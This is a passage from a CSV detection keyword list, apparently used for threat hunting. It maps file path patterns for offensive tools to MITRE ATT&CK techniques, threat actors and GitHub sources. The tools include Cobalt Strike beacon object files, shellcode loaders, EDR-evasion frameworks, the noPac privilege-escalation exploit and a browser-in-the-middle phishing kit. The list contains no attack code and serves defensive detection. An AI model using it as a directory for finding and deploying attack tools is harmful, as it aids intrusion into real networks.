T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*/CrossC2Kit*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*/CrossC2Kit/*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*/CrossC2-test*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*/CrossNet-Beta/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 
- T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","10","10","352","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" +"*/crunch-wordlist/*","offensive_tool_keyword","crunch","Generate a dictionary file containing words with a minimum and maximum length","T1596 - T1596.001","TA0043","N/A","N/A","Credential Access","https://sourceforge.net/projects/crunch-wordlist/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/crypt0p3g/*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" +"*/cs2modrewrite/*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" +"*/CS-BOFs/*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 
T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z"
+"*/CSExec.py*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10",,"N/A",,,
+"*/CSExec.py.git*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10",,"N/A",,,
+"*/csharp/process_injection/*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"*/CSharpWinRM*","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","1","N/A","10","10","138","27","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" +"*/C--Shellcode*","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","10","10","21","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z" +"*/CS-Loader.go*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" +"*/CS-Loader/*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 
- T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" +"*/csOnvps/*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" 
+"*/csOnvps/*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" +"*/cs-rdll-ipc-example/*","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","101","24","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" +"*/CS-Remote-OPs-BOF*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/cs-token-vault/*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" +"*/cube0x0/noPac*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/cube0x0/noPac","1","1","N/A","N/A","10","1259","318","2021-12-16T09:50:15Z","2021-12-11T19:27:30Z" +"*/cuddlephish.git*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" +"*/cuddlephish.html*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - 
TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z"
+"*/cups-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/cups-queue-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/curl.cna","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - 
APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*/curl.x64.o","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*/curl.x86.o","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 
